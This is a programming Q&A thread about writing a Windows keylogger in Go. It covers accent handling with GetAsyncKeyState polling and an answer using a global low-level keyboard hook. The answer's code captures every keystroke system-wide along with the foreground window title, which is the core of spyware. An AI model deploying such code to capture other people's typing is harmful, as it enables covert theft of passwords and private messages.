# Building a Keylogger in GO for Windows - GetAsyncStateKey loop block pt-br accents to work properly

Tags: windows, go, winapi, keylogger

I´m building a keylogger in GOLANG for Windows, to count how many times the user pressed keyboard keys in a period and store it on a buffer.

I´m using https://github.com/kindlyfire/go-keylogger package to do the hard work for me, but when I start running, my keyboard logs properly, but gets no response by keys like "´", "^", "~" when combining with other letters (common in portuguese) such as "a", "o", "u" and stop printing these combinations ("á", "é", "ó") and so on. I read in some article that using GetAsyncStateKey is not the proper way to do that, but the author does not explain why it blocks these key combinations. Could someone help me do it in the proper way? The code i´m using is almost identical:

https://github.com/kindlyfire/go-keylogger

(package keylogger.go)

```
package keylogger

import (
    "syscall"
    "unicode/utf8"
    "unsafe"

    "github.com/TheTitanrain/w32"
)

var (
    moduser32 = syscall.NewLazyDLL("user32.dll")

    procGetKeyboardLayout     = moduser32.NewProc("GetKeyboardLayout")
    procGetKeyboardState      = moduser32.NewProc("GetKeyboardState")
    procToUnicodeEx           = moduser32.NewProc("ToUnicodeEx")
    procGetKeyboardLayoutList = moduser32.NewProc("GetKeyboardLayoutList")
    procMapVirtualKeyEx       = moduser32.NewProc("MapVirtualKeyExW")
    procGetKeyState           = moduser32.NewProc("GetKeyState")
)

// NewKeylogger creates a new keylogger depending on
// the platform we are running on (currently only Windows
// is supported)
func NewKeylogger() Keylogger {
    kl := Keylogger{}

    return kl
}

// Keylogger represents the keylogger
type Keylogger struct {
    lastKey int
}

// Key is a single key entered by the user
type Key struct {
    Empty   bool
    Rune    rune
    Keycode int
}

func (kl *Keylogger) GetKey() Key {
    activeKey := 0
    var keyState uint16

    for i := 0; i < 256; i++ {
        keyState = w32.GetAsyncKeyState(i)

        // Check if the most significant bit is set (key is down)
        // And check if the key is not a non-char key (except for space, 0x20)
        if keyState&(1<<15) != 0 && !(i < 0x2F && i != 0x20) && (i < 160 || i > 165) && (i < 91 || i > 93) {
            activeKey = i
            break
        }
    }

    if activeKey != 0 {
        if activeKey != kl.lastKey {
            kl.lastKey = activeKey
            return kl.ParseKeycode(activeKey, keyState)
        }
    } else {
        kl.lastKey = 0
    }

    return Key{Empty: true}
}
[...]continues
```

and main package:

```
package main

import (
    "fmt"
    "time"

    "github.com/kindlyfire/go-keylogger"
)

const (
    delayKeyfetchMS = 5
)

func main() {
    kl := keylogger.NewKeylogger()
    count := 0

    for {
        key := kl.GetKey()

        if !key.Empty {
            count ++
        }

        count++

        fmt.Printf("key count: %d\r", count)

        time.Sleep(delayKeyfetchMS * time.Millisecond)
    }
}
```

I noticed when i increase delayKeyfetchMS for up 200 or more it is easier to do the key combinations and sometimes it prints on screen.

Comment: A key-logger, as the name implies, logs keys. Translating keyboard input into *characters* is a highly complex task. That said, a key-logger that employs polling isn't going to be reliable anyway. The system already does the heavy-lifting for you, allowing you to respond to *events*, e.g. from low-level keyboard hook.

Comment: I don´t know if I´m asking in the right way, considering I´m total newbie, but I was reading about it and to capture events i first need to know which window is in foreground, and I´m trying to get these events globally. Thank u for the hint. I will dig deeper.

Comment: A low-level keyboard hook receives **all** input. You neither need to know what the current foreground window is, nor does the system know (or care) at the time it calls the hook. You could also use [Raw Input](https://learn.microsoft.com/en-us/windows/win32/inputdev/raw-input) to capture global input, for a less intrusive solution. Those are the easy issues to address. You still have the hard problem to solve: Translating keyboard input into characters. If you did some research you'd find loads of question like this. And the answer essentially is this: It's hard.

Answer (score 0):

I wrote a [blog post](https://xart3mis.github.io/posts/keylogger/#final-code) about how to create keylogger in golang. I hope it can be of any help to you.

check out the library [go-hook](https://github.com/moutend/go-hook/)

```golang
// package keylogger... it's a keylogger.
package keylogger

import (
    "fmt"
    "os"
    "os/signal"

    "syscall"
    "unsafe"

    "github.com/moutend/go-hook/pkg/keyboard"
    "github.com/moutend/go-hook/pkg/types"
    "golang.org/x/sys/windows"
)

var (
    mod = windows.NewLazyDLL("user32.dll")

    procGetKeyState         = mod.NewProc("GetKeyState")
    procGetKeyboardLayout   = mod.NewProc("GetKeyboardLayout")
    procGetKeyboardState    = mod.NewProc("GetKeyboardState")
    procToUnicodeEx         = mod.NewProc("ToUnicodeEx")
    procGetWindowText       = mod.NewProc("GetWindowTextW")
    procGetWindowTextLength = mod.NewProc("GetWindowTextLengthW")
)

type (
    HANDLE uintptr
    HWND   HANDLE
)

// Gets length of text of window text by HWND
func GetWindowTextLength(hwnd HWND) int {
    ret, _, _ := procGetWindowTextLength.Call(
        uintptr(hwnd))

    return int(ret)
}

// Gets text of window text by HWND
func GetWindowText(hwnd HWND) string {
    textLen := GetWindowTextLength(hwnd) + 1

    buf := make([]uint16, textLen)
    procGetWindowText.Call(
        uintptr(hwnd),
        uintptr(unsafe.Pointer(&buf[0])),
        uintptr(textLen))

    return syscall.UTF16ToString(buf)
}

// Gets current foreground window
func GetForegroundWindow() uintptr {
    proc := mod.NewProc("GetForegroundWindow")
    hwnd, _, _ := proc.Call()
    return hwnd
}

// Runs the keylogger
func Run(key_out chan rune, window_out chan string) error {
    // Buffer size is depends on your need. The 100 is placeholder value.
    keyboardChan := make(chan types.KeyboardEvent, 100)

    if err := keyboard.Install(nil, keyboardChan); err != nil {
        return err
    }

    defer keyboard.Uninstall()

    signalChan := make(chan os.Signal, 1)
    signal.Notify(signalChan, os.Interrupt)

    fmt.Println("start capturing keyboard input")

    for {
        select {
        case <-signalChan:
            fmt.Println("Received shutdown signal")
            return nil
        case k := <-keyboardChan:
            if hwnd := GetForegroundWindow(); hwnd != 0 {
                if k.Message == types.WM_KEYDOWN {
                    key_out <- VKCodeToAscii(k)
                    window_out <- GetWindowText(HWND(hwnd))
                }
            }
        }
    }
}

// Converts from Virtual-Keycode to Ascii rune
func VKCodeToAscii(k types.KeyboardEvent) rune {
    var buffer []uint16 = make([]uint16, 256)
    var keyState []byte = make([]byte, 256)

    n := 10
    n |= (1 << 2)

    procGetKeyState.Call(uintptr(k.VKCode))

    procGetKeyboardState.Call(uintptr(unsafe.Pointer(&keyState[0])))
    r1, _, _ := procGetKeyboardLayout.Call(0)

    procToUnicodeEx.Call(uintptr(k.VKCode), uintptr(k.ScanCode), uintptr(unsafe.Pointer(&keyState[0])),
        uintptr(unsafe.Pointer(&buffer[0])), 256, uintptr(n), r1)

    if len(syscall.UTF16ToString(buffer)) > 0 {
        return []rune(syscall.UTF16ToString(buffer))[0]
    }
    return rune(0)
}
```

```golang
func Run(key_out chan rune, window_out chan string) error {
    // Buffer size is depends on your need. The 100 is placeholder value.
    keyboardChan := make(chan types.KeyboardEvent, 1024)

    if err := keyboard.Install(nil, keyboardChan); err != nil {
        return err
    }

    defer keyboard.Uninstall()

    signalChan := make(chan os.Signal, 1)
    signal.Notify(signalChan, os.Interrupt)

    fmt.Println("start capturing keyboard input")

    for {
        select {
        case <-signalChan:
            fmt.Println("Received shutdown signal")
            return nil
        case k := <-keyboardChan:
            if hwnd := GetForegroundWindow(); hwnd != 0 {
                if k.Message == types.WM_KEYDOWN {
                    key_out <- VKCodeToAscii(k)
                    window_out <- GetWindowText(HWND(hwnd))
                }
            }
        }
    }
}
```

First initialize a buffered channel to store keyboard events then install the low level keyboard hook using keyboard.Install().
defer uninstallation of the hook so that it gets uninstalled when the function returns. Then in an infinite for loop get the foreground window using GetForegroundWindow() and when a key is pressed send the key to the key_out channel and the window name to window_out channel.

NOTE: This only works for windows.